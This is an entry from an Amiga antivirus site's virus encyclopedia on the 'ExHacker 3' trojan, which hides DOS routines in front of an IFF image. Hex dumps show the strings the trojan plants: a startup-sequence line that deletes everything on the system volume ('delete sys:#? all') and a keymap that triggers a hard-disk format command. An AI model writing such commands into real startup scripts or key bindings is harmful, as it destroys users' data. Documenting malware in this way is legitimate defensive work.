 |
Amiga Antivirus Website www.vht-dk.dk |
 |
------------------------
Amiga Virus Encyclopedia
ExHacker 3 trojan
------------------------
Name : ExHacker 3 trojan
Aliases : Swifter
Original : -
Type : File/Trojan
Size : 106496 bytes (Unpacked)
215448 bytes (Packed with Imploder)
Symptoms : No Sypmtoms
Discovered : -
Way to infect: Some DOS routines were placed in front of an IFF image.
These DOS routines have destruction functions
Rating : -
Kickstarts : 1.2
1.3
2.0
3.0
Damage : No corrupted vectors
No proliferation
Visible text : -
Comments : In the unpacked file you can read:
733a7374 61727475 s:startu
702d7365 7175656e 63650063 3a646972 p-sequence.c:dir
00633a63 6f707900 633a6564 00633a64 .c:copy.c:ed.c:d
656c6574 6500636f 70792030 30332e64 elete.copy 003.d
61742073 3a007265 6e616d65 20733a30 at s:.rename s:0
30332e64 61742073 3a737461 72747570 03.dat s:startup
2d736571 75656e63 65003030 312e6461 -sequence.001.da
74204b45 594d4150 533a2022 22003030 t KEYMAPS: "".00
322e6461 74203030 302e6461 7400464f 2.dat 000.dat.FO
So a new startup-s. written, which contains a delete
function (effective only after a reset) L: 73 bytes:
64656c65 74652073 79733a23 3f20616c delete sys:#? al
6c0a3b20 7a786a62 676d6d6b 65757775 l.; zxjbgmmkeuwu
39333233 2c746e63 48414841 21204841 9323,tncHAHA! HA
48412179 62657476 63686564 74697469 HA!ybetvchedtiti
79726367 64220a0a 0a00 yrcgd"....
But!!! A new keymap is also activated, the keyboard
layout of which contains dangerous sequences. Lenght
: 1972 bytes:
5a020402 1a080122 01230124 4b455942 Z......".#.$KEYB
204b494c 4c45523a 204b4152 4c204552 KILLER: KARL ER
1d040521 464f524d 41542044 45564943 ...!FORMAT DEVIC
453d4448 303a204e 414d453d 31205120 E=DH0: NAME=1 Q
Removal : VirusZ III, with the new Xvs.library installed
Test made by : Heiner Schneegold
|
 |
Denmark & Canada Amiga Antivirus Website Copyright © All Rights Reserved |
|